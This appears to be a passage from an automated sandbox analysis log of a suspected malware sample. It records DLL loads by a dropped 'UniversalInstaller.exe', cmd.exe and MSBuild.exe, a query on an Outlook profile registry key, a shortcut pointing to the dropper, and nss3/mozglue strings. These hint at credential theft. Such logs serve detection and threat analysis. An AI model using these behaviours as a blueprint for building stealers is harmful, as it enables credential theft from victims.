                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winhttp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: hplcabqlulk.22.drLNK file: ..\..\..\..\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: zLwT7vCojz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: mozglue.pdbP source: u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
                            Source: Binary string: nss3.pdb@ source: u48o.0.exe, 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2517001138.00000256583E0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp
